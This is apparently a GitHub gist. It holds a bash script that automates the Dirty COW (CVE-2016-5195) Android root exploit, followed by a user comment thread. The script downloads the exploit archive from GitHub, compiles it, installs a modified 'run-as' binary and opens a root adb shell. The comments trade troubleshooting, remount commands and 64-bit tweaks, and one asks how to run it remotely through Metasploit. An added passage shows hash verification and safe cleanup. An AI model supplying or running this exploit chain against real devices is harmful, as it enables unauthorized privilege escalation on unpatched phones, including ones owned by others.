#!/bin/bash
# Give the usual warning.
clear;
# -e is needed so that bash's echo interprets the \n escapes.
echo -e "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
workspacezip="dirtyc0w_workspace.zip";
workspace="dirtyc0w_workspace";
rm -f "$workspacezip" > /dev/null; # Remove zip if it exists
rm -rf "$workspace" > /dev/null; # Remove workspace if it exists
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;
if [ -f "$workspacezip" ];
then
    echo "[INFO] Extracting exploit files...";
    unzip -a "$workspacezip" -d "$workspace" > /dev/null;
    rm -f "$workspacezip"; # Remove zip if it exists
else
    echo "[ERR] Failed to download exploit files.";
    exit 1;
fi;
if [ -d "$workspace" ];
then
    cd "$workspace";
    directory=$PWD; # thx @tomdeboer!
    cd CVE-2016-5195-master;
else
    echo "[ERR] Failed to extract exploit files.";
    exit 1;
fi;
# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
make root;
clear;
# Hooray!
echo -en "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf "$directory"; # Clean up workspace
echo "Done";
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
adb shell;
clear;
exit 0;

Hey, cool seeing you on the front page of HN!

@beardog108 I am? :P

Well, if you can execute as root, I'm pretty sure that qualifies as rooting in this case.

It'd be nice to have a little check after the download and unzip to see if it worked, otherwise your $PWD will be recursively removed. Edit: Done.

@tomdeboer Haha, that's true. Revised the code.

Why does it download and execute a script from the web (and not even verify a hash!) instead of bundling the necessary files? (At least it uses HTTPS...)

@RenaKunisaki Right, I'll do that when I have time. Thanks.
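
The two review points raised in the comments above (check the download before using it, and keep the cleanup from removing the wrong directory), as an added example that is not part of the original gist or its comments: a fail-closed SHA-256 check against a pinned digest and a guarded workspace removal. The function names are hypothetical, the demo file is constructed, and the caller supplies the digest; no digest comes from this page.

```shell
# Added example (not from the gist). Function names are hypothetical.

# Print the SHA-256 of a file as lowercase hex.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Succeed only if the file exists and its digest equals the pinned one.
verify_pinned() {
    local file=$1 expected=$2 actual
    [ -f "$file" ] || return 2
    # Reject anything that is not exactly 64 hex characters.
    case "$expected" in
        ""|*[!0-9a-fA-F]*) return 3 ;;
    esac
    [ "${#expected}" -eq 64 ] || return 3
    actual=$(sha256_of "$file") || return 4
    expected=$(printf '%s' "$expected" | tr 'A-F' 'a-f')
    [ "$actual" = "$expected" ]
}

# Remove a workspace only if it resolves to a path strictly inside parent.
safe_cleanup() {
    local dir=$1 parent=$2 real_dir real_parent
    [ -n "$dir" ] && [ -d "$dir" ] && [ -d "$parent" ] || return 1
    real_dir=$(cd "$dir" && pwd -P) || return 1
    real_parent=$(cd "$parent" && pwd -P) || return 1
    case "$real_dir" in
        "$real_parent"/?*) rm -rf -- "$real_dir" ;;
        *) return 1 ;;
    esac
}

# Constructed demo: a stand-in file plays the role of the downloaded archive.
demo() {
    local ws pinned
    ws=$(mktemp -d) || return 1
    printf 'constructed sample bytes' > "$ws/archive.zip"
    pinned=$(sha256_of "$ws/archive.zip")   # in practice: recorded ahead of time
    verify_pinned "$ws/archive.zip" "$pinned" && echo "digest ok, safe to extract"
    printf 'tampered' >> "$ws/archive.zip"
    verify_pinned "$ws/archive.zip" "$pinned" || echo "digest mismatch, refusing"
    rm -rf -- "$ws"
}
demo
```

Pinning a digest only helps when the download URL names an immutable artifact such as a specific commit or release; a branch archive changes whenever the branch does.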

It does not work on my stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel 3.4.0-8538464).

@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but you can change a setting in the makefile so it compiles for 64-bit architecture. Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7

Is there something I'm doing wrong here?

@MF064DD Is there an error when you run: wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip; ? Edit: Oh, never mind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!

Still the same error: Failed to download exploit files

Exactly what he said. :p Maybe I'm doing it wrong. I installed the necessary sdk modules and such. Here's a visual.

When I try just to execute the wget command I get this error:

@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.

No problem man! Hey, you gotta life. I can wait as long as you need us to. ^^

@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too). I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though: Root Android 32-bit / Guide
Prerequisites
Steps
And tada! The

@blizzard4591 Here's a quote from the issue: The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries. [This is how I modified the file]
A good way to get the device's ABI could be

Total noob here: is it usable on an Exynos S7Edge (G935F)? If so, would it trip Knox to 0x1? (I assume it won't, but asking to be sure)

Man, those semicolons are driving me crazy. :O This is just an automation script for the CVE repo, right?

Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI

I got run-as on my phone, but if I try to do anything with it I get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader, could that have something to do with it?

Is this only for 32-bit Android phones?

Heh, here we go. @RaPoZaUm Probably would work, but I haven't tested it.

Does anyone have any idea what to use for the argument of run-as?
Edit: I found what goes in package-name, this will give you a list of options
but... it doesn't work, example:

@Arinerron my phone is 32-bit :/

It won't work anyway. The exploit in question can't run anything out of its normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run

Have you taken into account that

Arinerron, please do the automation script for 64-bit. I tried to modify it the way you showed, but I could not get ... I have a backup of the TA partition for my Sony XA Ultra, made via the dirtyc0w escalation exploit. Now I need to exploit to root, but I did not get it. Please help me.

Hello, sorry if I'm not an expert, but when I execute "run-as" it shows:

Will this work on the Doogee X9 Pro, or will I brick my device with this? Will this script install SuperSU, or must I manually download it?

@PVineeth @MrMino @tinxx @garikay @Pcmster @Buranek If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :) @MF064DD Sorry for the late response. Type Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.

I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do
If I try to run any package with Any thoughts @Arinerron?

I tried using this on LG G3 (with armeabi-v7a version), but I get this error:
And
Does anybody have any suggestions?

@Arinerron Is there any way to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace

nice

@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard.

Hi @Arinerron,
shell@P1a42:/ # echo "pwned" > root_only_file.txt
Are there any extra steps to make it work?

Hi @thaomvs, you need to remount the file system for writing

@thaomvs Sorry about the late reply-- Simply executing

Once I gain root access I can't remount system for installing the su binary,
athene_f:/ $ run-as
uid run-as 2000
athene_f:/ # whoami
root
athene_f:/ # mount -o rw,remount /system
Steps
make root && adb shell; and my phone is 32-bit. Thanks

@Arinerron I have read through the comments and I have a question.

@sevenup30 Try remounting

@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system is already patched?

Hi, I've done all the steps, but don't get any info instead of exploited.

@20esaua After running this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system

Is there something we have to write in place of "by-name"?

So this script installs a custom version of run-as? Do I lose my guarantee if I use this script?

@Arinerron Hello! I am very new to GitHub; it is my first comment. I just signed up and want to ask you something. I came to know about this vulnerability, but I was working on Metasploit and somehow found that video where it shows gaining root privilege remotely through Metasploit: you just have to open USB debugging and run this root.sh in the Android mobile's /sdcard dir. So my question is, as I am facing the same error that the files fail to download from GitHub when I run the script in a Metasploit session, but when I run it in the directory where the SDK is installed it works but says no emulated or Android devices connected, obviously. I just downloaded the SDK manually and extracted it in the home directory, but whenever I try to run the script in a Metasploit session it fails to download from GitHub. Can you please simplify my issue for me? I just straightforwardly want to know: is it possible to gain access remotely without the device being connected through USB, and have this root.sh running and getting root privilege? If yes, then how can I use those manual steps you provided, as I can't connect the device I want to try it on with Metasploit...
I put 'root' in quotes, because technically, it isn't rooting. However, it creates a binary called 'run-as' that can execute packages as root.